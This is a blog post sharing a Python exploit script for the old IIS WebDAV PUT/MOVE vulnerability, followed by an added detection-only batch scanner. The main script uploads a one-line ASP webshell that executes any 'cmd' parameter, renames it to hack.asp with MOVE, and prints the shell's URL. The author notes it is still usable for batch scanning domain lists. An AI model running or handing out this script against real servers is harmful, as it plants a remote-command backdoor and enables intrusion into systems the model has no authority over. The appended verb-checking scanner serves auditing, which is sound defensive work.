Python IIS PUT File script

I've been busy at work on weekdays and haven't sorted through the code on my PC much. Here is the exploit script I wrote a while ago for the IIS PUT file vulnerability; this vulnerability is really very old...

#-*- encoding:utf-8 -*-

'''
IIS put file From https://www.lijiejie.com

Usage:
    iisPUT.py www.example.com:8080
'''

import http.client
import sys

# One-line ASP backdoor: runs whatever is passed in the "cmd" request parameter.
WEBSHELL = '<%execute(request("cmd"))%>'

if len(sys.argv) != 2:
    print(__doc__)
    sys.exit(1)

target = sys.argv[1]

try:
    conn = http.client.HTTPConnection(target, timeout=10)
    conn.request(method='OPTIONS', url='/')
    # Lower-case the header names so the lookups below do not depend on the server's casing.
    headers = {k.lower(): v for k, v in conn.getresponse().getheaders()}
    if 'Microsoft-IIS' not in headers.get('server', ''):
        print('This is not an IIS web server')

    # IIS lists the WebDAV verbs it accepts in the Public: header. Both PUT and MOVE are
    # needed: the shell is uploaded as hack.txt and then renamed to hack.asp with MOVE.
    public = headers.get('public', '')
    if 'PUT' in public and 'MOVE' in public:
        conn.close()
        conn = http.client.HTTPConnection(target, timeout=10)
        # PUT hack.txt
        conn.request(method='PUT', url='/hack.txt', body=WEBSHELL)
        resp = conn.getresponse()
        print('PUT /hack.txt:', resp.status, resp.reason)
        conn.close()
        conn = http.client.HTTPConnection(target, timeout=10)
        # mv hack.txt to hack.asp
        conn.request(method='MOVE', url='/hack.txt', headers={'Destination': '/hack.asp'})
        resp = conn.getresponse()
        print('MOVE /hack.txt -> /hack.asp:', resp.status, resp.reason)
        conn.close()
        print('ASP webshell:', 'http://' + target + '/hack.asp')
    else:
        print('Server not vulnerable')

except Exception as e:
    print('Error:', e)

Given a list of domains, it is still usable for batch scanning.
But there are really very few hosts left that still have the PUT File vulnerability.
Gist: https://gist.github.com/lijiejie/3eb6c4a1db9b3fe3c59a
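For the batch-scanning use the post mentions, here is an added example (not code from the original post or the gist) that only does the detection half of the script above: it sends OPTIONS / to every host in a list, parses the Public:/Allow: header into a set of verbs, and reports which hosts advertise both PUT and MOVE. It never uploads anything. The sample header dictionaries and the hosts-file name are constructed for illustration.

```python
import concurrent.futures
import http.client
import sys

# Both WebDAV verbs the upload-then-rename trick relies on must be advertised.
REQUIRED_METHODS = {"PUT", "MOVE"}


def parse_method_list(value):
    """Split a Public: or Allow: header value such as
    'OPTIONS, TRACE, GET, HEAD, PUT, MOVE' into a set of upper-case verbs."""
    return {tok.strip().upper() for tok in value.split(",") if tok.strip()}


def classify(headers):
    """Decide from the headers of an OPTIONS response whether the host looks
    like IIS and whether it advertises both PUT and MOVE.

    headers: mapping of header name -> value, in any letter case.
    Returns (is_iis, advertises_put_move)."""
    lower = {k.lower(): v for k, v in headers.items()}
    is_iis = "microsoft-iis" in lower.get("server", "").lower()
    methods = set()
    # IIS lists its WebDAV verbs in Public:; other servers use the standard Allow:.
    for name in ("public", "allow"):
        if name in lower:
            methods |= parse_method_list(lower[name])
    return is_iis, REQUIRED_METHODS <= methods


def probe(host, timeout=5.0):
    """Send OPTIONS / to one 'host[:port]' and return
    (host, status, is_iis, advertises_put_move); status is None on error."""
    conn = http.client.HTTPConnection(host, timeout=timeout)
    try:
        conn.request("OPTIONS", "/")
        resp = conn.getresponse()
        is_iis, writable = classify(dict(resp.getheaders()))
        return host, resp.status, is_iis, writable
    except (OSError, http.client.HTTPException):
        return host, None, False, False
    finally:
        conn.close()


def scan(hosts, workers=20):
    """Probe every host in parallel; the result order matches the input order."""
    with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as pool:
        return list(pool.map(probe, hosts))


# Constructed OPTIONS response headers, used to exercise classify() offline.
SAMPLE_IIS6 = {
    "Server": "Microsoft-IIS/6.0",
    "Public": "OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, "
              "MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH",
}
SAMPLE_NGINX = {"Server": "nginx/1.18.0", "Allow": "GET, HEAD, OPTIONS"}


if __name__ == "__main__":
    # Usage: python iis_put_scan.py hosts.txt  (one host[:port] per line; file name is hypothetical)
    with open(sys.argv[1]) as fh:
        targets = [line.strip() for line in fh if line.strip()]
    for host, status, is_iis, writable in scan(targets):
        if status is None:
            print(f"{host}\tunreachable")
        else:
            print(f"{host}\t{status}\tIIS={is_iis}\tPUT+MOVE={writable}")
```

A host that advertises the verbs is only a candidate: the header says what the server accepts in principle, not that the web root is writable. Before reporting a host as exploitable, confirm with the PUT response status (201 Created for a newly created file) rather than trusting the OPTIONS listing alone.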
